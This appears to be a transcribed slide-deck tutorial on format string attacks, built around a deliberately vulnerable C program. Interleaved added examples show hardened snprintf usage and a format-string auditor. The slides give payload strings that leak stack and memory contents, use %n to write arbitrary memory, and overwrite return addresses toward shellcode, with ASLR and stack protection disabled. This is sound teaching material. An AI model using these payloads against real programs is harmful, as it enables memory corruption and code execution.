A story of learning about format string attacks and sharing what was learned. Outline: illustrating format string vulnerabilities; a case study (fsa.c; compile and set up an insecure environment; viewing the stack; viewing memory at any location; overwriting of arbitrary memory); so, you can…
Format String Attacks
AJ
2014.1.18
About Me
• Studying at National Chung Cheng University
• The simulator of a 5-axis CNC machine tool
• CUDA programming for real-time collision detection
• 若渴計畫 & MOSUT
Outline
• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and setup insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting of arbitrary memory
• So, you can…
Format String Vulnerabilities
• format string <-> argv[1]
• printf(argv[1])
• strcpy(buff, argv[1])
• snprintf(buf, sizeof buf, argv[1]);
• …
• EX: compile & execute
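The vulnerable call from the list above, placed beside its hardened form. This is an added C example, not the deck's fsa.c (whose source is not reproduced on the page); copy_vulnerable and copy_hardened are names chosen for the example. The only change is that the untrusted text moves from the format position into a "%s" argument, after which every directive it contains is copied as ordinary characters instead of being interpreted.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable shape from the slides: the untrusted text *is* the format
 * string, so any "%x", "%s" or "%n" inside it is interpreted against the
 * caller's stack. Kept only for side-by-side comparison; in this example
 * it is only ever called with input that contains no '%'. The compiler
 * warning this line produces is the one the slides silence with
 * -Wno-format-security. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int copy_vulnerable(char *buf, size_t n, const char *untrusted)
{
    return snprintf(buf, n, untrusted);
}
#pragma GCC diagnostic pop

/* Hardened shape: the format is a string literal and the untrusted text is
 * passed as data for "%s". Directives in the input are copied verbatim. */
int copy_hardened(char *buf, size_t n, const char *untrusted)
{
    return snprintf(buf, n, "%s", untrusted);
}

int main(void)
{
    char buf[100];
    /* Constructed input modelled on the argv[1] used in the slides. */
    copy_hardened(buf, sizeof buf, "%x.%x.%x.%x.%x");
    printf("hardened copy: %s\n", buf);   /* the directives appear literally */
    return 0;
}
```

With the hardened form, "%x.%x.%x.%x.%x" and even "100%% done" come out exactly as typed; the format-security warning disappears as well, because the compiler can now see a literal format with a matching argument.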
A Case Study: fsa.c
A Case Study: Compile and Setup Insecure Environment
• Compile
  • gcc -g -Wno-format-security -fno-stack-protector fsa.c
• Disable ASLR (address space layout randomization)
  • sudo sysctl -w kernel.randomize_va_space=0
• x86 machine & Ubuntu 12.04
Stack Status before Executing snprintf()
(stack diagram, top = esp: ??, ??, ??, x = 97 = ‘a’, buf[100])
Viewing the Stack: “%x.%x.%x.%x.%x”
• Format string = %x.%x.%x.%x.%x
• snprintf(buf, sizeof buf, argv[1]) => snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)
(stack diagram, top = esp; the argv[1] pointer refers to the heap string “%x.%x.%x.%x.%x”)
  Buffer pointer
  Buffer length
  argv[1] pointer
  ?? b7ff3fec   <- 1st %x
  ?? bfffff3b4  <- 2nd %x
  ?? 0          <- 3rd %x
  x = 97 = ‘a’  <- 4th %x
  buf[100]      <- 5th %x (??)
• Fetch: each %x fetches the next word on the stack
• Copy: buf[100] = b7ff3fec.Bfffff3b4.0.61.66663762(ff7b)
• The execution order of “copy” and “fetch” is switched by the OS
• Richard Reese, 透視 C 語言指標 (Understanding and Using C Pointers), p.128
• C call convention: http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html
Viewing the Stack: “aaaa.%x.%x.%x.%x.%x”
• Format string = aaaa.%x.%x.%x.%x.%x
• ‘a’ is 0x61 in ASCII
• snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”)
(stack diagram, top = esp; the argv[1] pointer refers to the heap string “aaaa.%x.%x.%x.%x.%x”)
  Buffer pointer
  Buffer length
  argv[1] pointer
  ?? b7ff3fec   <- 1st %x
  ?? bfffff3b4  <- 2nd %x
  ?? 0          <- 3rd %x
  x = 97 = ‘a’  <- 4th %x
  buf[100] = aaaa.b7ff3fec.bffff3a4.0.61.61616161   <- 5th %x
Viewing Memory at Any Location
• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%x
• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%s
(stack diagram: x = 97 = ‘a’; buf[0] = bffff2f8, the word the final %s is applied to; address bffff2f8)
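The “viewing the stack” and “viewing memory” slides above both rest on one mechanism: each directive makes printf's argument loop fetch the next word, and %s or %n additionally treat that word as a pointer. The following added C example (not part of the deck; audit_format and format_is_safe_for_untrusted are names chosen here) walks a format string statically the same way, counting how many words it would fetch, how many it would dereference and how many it would write through. A code-review tool or fuzz harness can use it to flag any untrusted string that would fetch even a single argument; positional %n$ forms are reported as unsupported.

```c
#include <stdio.h>
#include <string.h>

/* Result of statically walking a format string the way printf's
 * argument loop does at run time. */
struct fmt_audit {
    int consumed;   /* words (arguments) the directives would fetch */
    int derefs;     /* %s / %n: words treated as pointers, not plain values */
    int writes;     /* %n: words written through */
    int bad;        /* truncated or unsupported directive seen */
};

struct fmt_audit audit_format(const char *fmt)
{
    struct fmt_audit a = {0, 0, 0, 0};
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* "%%" is a literal percent */
        while (*p && strchr("-+ #0", *p)) p++;   /* flags */
        if (*p == '*') { a.consumed++; p++; }    /* '*' width fetches an int */
        else while (*p >= '0' && *p <= '9') p++; /* numeric width */
        if (*p == '.') {                         /* precision */
            p++;
            if (*p == '*') { a.consumed++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++; /* length modifiers */
        switch (*p) {
        case 'd': case 'i': case 'u': case 'x': case 'X': case 'o': case 'c':
        case 'p': case 'e': case 'E': case 'f': case 'F': case 'g': case 'G':
        case 'a': case 'A':
            a.consumed++;                        /* one word, read as a value */
            break;
        case 's':
            a.consumed++; a.derefs++;            /* one word, read as a pointer */
            break;
        case 'n':
            a.consumed++; a.derefs++; a.writes++; /* one word, written through */
            break;
        default:
            a.bad = 1;                           /* '\0' (truncated) or unknown */
            return a;
        }
    }
    return a;
}

/* Policy for text of untrusted origin: it may only reach a format position
 * if it would fetch nothing at all. The real fix is "%s"; this check is for
 * tooling that has to find the places where that fix is still missing. */
int format_is_safe_for_untrusted(const char *fmt)
{
    struct fmt_audit a = audit_format(fmt);
    return !a.bad && a.consumed == 0;
}

int main(void)
{
    /* The strings from the slides, constructed here as sample input. */
    const char *samples[] = {
        "%x.%x.%x.%x.%x",
        "aaaa.%x.%x.%x.%x.%x",
        "\xf8\xf2\xff\xbf.%x.%x.%x.%x.%s",
        "\xf8\xf2\xff\xbf.%x.%x.%x.%x.%n",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct fmt_audit a = audit_format(samples[i]);
        printf("fetch=%d deref=%d write=%d bad=%d\n",
               a.consumed, a.derefs, a.writes, a.bad);
    }
    return 0;
}
```

All four slide strings fetch exactly five words, which is why five %x directives walk from the first ?? word up to buf[100]; the %s variant dereferences the fifth word and the %n variant writes through it.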
Overwriting of Arbitrary Memory
• %n: when the %n field is encountered in the format string, the number of characters written so far is stored into the int pointed to by the corresponding argument
• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%n
(stack diagram: before, x = 97 = ‘a’ and buf[0] = bffff2f8 %s; after, x = 28 = 0x1c and buf[0] = bffff2f8 %n; bffff2f8 is the address %n writes through; slide note: 26(??) alignment)
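The slide's result x = 28 follows from what %n stores: the count of bytes emitted before it. The added C example below (not from the deck; bytes_written_before_n and the SLIDE_WORD constants are names chosen here) reproduces that arithmetic with a well-formed call, supplying the slide's four stack words as explicit arguments so nothing is fetched from the caller's stack. The fixed text (four address bytes, five dots, b7ff3fec, bffff3b4, 0) is 26 bytes; the fourth field contributes the remainder, so a wider field width raises the stored value.

```c
#include <stdio.h>

/* The four stack words the slides read with %x, supplied as explicit
 * arguments so that every directive has a matching parameter. */
#define SLIDE_WORD1 0xb7ff3fecu
#define SLIDE_WORD2 0xbffff3b4u
#define SLIDE_WORD3 0x0u
#define SLIDE_WORD4 0x61u            /* x = 97 = 'a' */

/* Emit "<4 address bytes>.%x.%x.%x.%<width4>x." and return what %n stores
 * at that point: the number of bytes written so far. Returns -1 if that
 * differs from snprintf's own return value, which counts the same bytes
 * without writing through any pointer. */
int bytes_written_before_n(int width4)
{
    char buf[128];
    int stored = -1;
    int ret = snprintf(buf, sizeof buf, "%c%c%c%c.%x.%x.%x.%*x.%n",
                       0xf8, 0xf2, 0xff, 0xbf,      /* the \xf8\xf2\xff\xbf bytes */
                       SLIDE_WORD1, SLIDE_WORD2, SLIDE_WORD3,
                       width4, SLIDE_WORD4, &stored);
    return (ret == stored) ? stored : -1;
}

int main(void)
{
    printf("%%x  -> %d\n", bytes_written_before_n(0));   /* 28, as on the slide */
    printf("%%4x -> %d\n", bytes_written_before_n(4));   /* 30 */
    printf("%%8x -> %d\n", bytes_written_before_n(8));   /* 34 */
    return 0;
}
```

The return value of snprintf gives the same count with no write through a pointer, which is why legitimate code never needs %n; glibc built with _FORTIFY_SOURCE additionally aborts when it meets %n in a format string that lives in writable memory, such as a buffer holding user input.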
So, You Can…
• Format string vulnerabilities
• Viewing the stack
• Finding return addresses
• Overwriting return addresses
• Overwriting return addresses to point to shellcode
• EX:
  $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => return address = 28
  $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => return address = 30
  $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => return address = 34
  $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => return address = shellcode address
You can overwrite arbitrary memory, if there are format string vulnerabilities
Reference
• Tim Newsham, “Format String Attacks”: http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• stackoverflow, “How can a Format-String vulnerability be exploited?”: http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited
• Paul Haas, “Advanced Format String Attacks”: http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf
• David Brumley, course slides: http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• Scut et al., “Exploiting Format String Vulnerabilities”: http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf